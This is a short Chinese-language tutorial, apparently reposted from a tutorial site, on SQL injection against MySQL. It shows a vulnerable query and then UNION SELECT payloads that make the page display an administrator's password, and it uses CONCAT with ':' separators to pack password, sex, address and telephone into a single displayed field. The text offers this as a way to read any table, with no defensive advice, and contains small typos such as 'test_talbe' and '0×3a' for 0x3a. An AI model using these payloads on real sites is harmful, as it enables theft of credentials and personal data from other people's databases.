《Mysql必讀Mysql數據庫使用concat函數執行SQL注入查詢》要點:
本文介紹了Mysql必讀Mysql數據庫使用concat函數執行SQL注入查詢,希望對您有用。如果有疑問,可以聯系我們。
SQL注入語句有時候會使用替換查詢技術,就是讓原有的查詢語句查不到結果出錯,而讓自己構造的查詢語句執行,并把執行結果代替原有查詢語句查詢結果顯示出來.MYSQL數據庫
例如:原本查詢語句是
MYSQL數據庫
代碼如下:
select username,email,content from test_table where user_id=uid;
其中uid,是用戶輸入的.正常顯示結果會出現用戶名,用戶郵箱,用戶留言內容.但是如果uid過濾不嚴,我們可以構造如下SQL語句來獲得任意數據表信息.
代碼如下:
uid=-1 union select username ,password,content from test_talbe where user_id=管理員id;
實際執行就是
代碼如下:
select username,email,content from test_table where user_id=-1 union select username ,password,content from test_talbe where user_id=管理員id;
其中顯示正常用戶emai的地方,變成了顯示管理員的密碼了.
但是,往往事情并不是這么簡單,首先要找到漏洞,其次構造這種語句時候要考慮各個字段的類型,讓int或samllint類型的字段顯示varchar顯然不合適.最后就是本文要說的.MYSQL數據庫
如果出現問題的SQL語句只有一個或兩個字段怎么辦,我們想知道很多東西,一兩個字段太少了,遠遠不能滿足我們的需要.那么我們可以使用concat函數.MYSQL數據庫
concat函數本來是這樣用的SELECT CONCAT('My', 'S', 'QL');執行結果是'MySQL'.也就是連接作用的.我們利用它來為我們服務,
MYSQL數據庫
代碼如下:
uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理員id;
這個語句實際查詢了六個字段,但是顯示的時候,把password,sex,address,telephone等字段合在一起,顯示在原本應該顯示email的地方.
更好的方法:中間用分隔符分開:
MYSQL數據庫
代碼如下:
uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理員id;
其中0×3a是“:”的十六進 制形式.
轉載請注明本頁網址:
http://www.fzlkiss.com/jiaocheng/5389.html
